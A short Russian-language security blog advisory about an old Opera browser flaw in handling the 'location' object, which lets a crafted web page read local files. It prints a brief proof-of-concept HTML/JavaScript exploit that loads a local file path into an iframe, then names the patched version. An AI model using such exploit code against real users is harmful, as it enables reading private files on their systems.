Рекламный блок
Управляй электронным кошельком с телефона!
Banner_ads_468x60
text_ad
Вход на сайт:
 
Логин
Пароль
 
Навигация по сайту:
Опрос сайта:
Нужен ли форум на сайте?
Да, нужен. Для обсуждения проблем.
Нет, не нужен, для обсуждения хватает комментариев.
Информация:
Подписка на новости:

Рассылки@Mail.ru

Webalta Уровень доверия
Мобильный контент - закачаешься!



Security Blog Open Catalog
Стань автором Security Blog
Удаленный доступ к файлам на системе пользователя в Opera Категория: Взлом, Уязвимости

Уязвимость обнаружена в Opera в обработке 'location' объекта. Удаленный пользователь может читать произвольные файлы на целевой системе пользователя.


Удаленный пользователь может сконструировать HTML, который, когда будет загружен целевым пользователем, прочитает файлы на целевой системе пользователе или запустит в контексте удаленного домена.

Пример:

< iframe>< /iframe>
< script type="text/javascript">
onload=function () {
var oVictim=frames[0];
oVictim.location.href="file://localhost/c:
/winnt/help/ciadmin.htm";
oVictim.location.replace=function () {
oVictim.alert("We now have full file system
access using
"+location.href);
}

< /script>

Установите обновленную версию программы (7.54): www.opera.com/download/

Источник: CyberInfo


Информация
Посетители, находящиеся в группе "Гости" не могут оставлять комментарии на сайте.
Рекламный блок
banner_ad_468x60
 
Copyright© 2005-2007 . All Rights Reserved